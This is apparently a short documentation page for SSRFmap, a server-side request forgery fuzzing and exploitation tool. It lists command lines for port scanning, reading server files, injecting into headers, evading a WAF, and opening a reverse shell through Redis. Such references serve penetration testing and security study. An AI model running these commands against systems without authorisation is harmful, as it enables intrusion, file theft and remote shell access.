SSRFmap

Overview

Automatic SSRF fuzzer and exploitation tool

Help

ssrfmap -h

Launch a portscan on localhost and read default files

ssrfmap -r request.txt -p url -m readfiles,portscan

Launch a portscan against an HTTPS endpoint using a custom user-agent

ssrfmap -r request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"

Triggering a reverse shell on a Redis (Specify LHOST and LPORT)

ssrfmap -r request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

Inject inside a header, a GET or a POST parameter, you only need to specify the parameter name

ssrfmap -r request.txt -p X-Custom-Header -m readfiles --rfiles /tmp/test

When the target is protected by a WAF or some filters you can try a wide range of payloads and encoding with the parameter --level

# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...

Last updated 2 months ago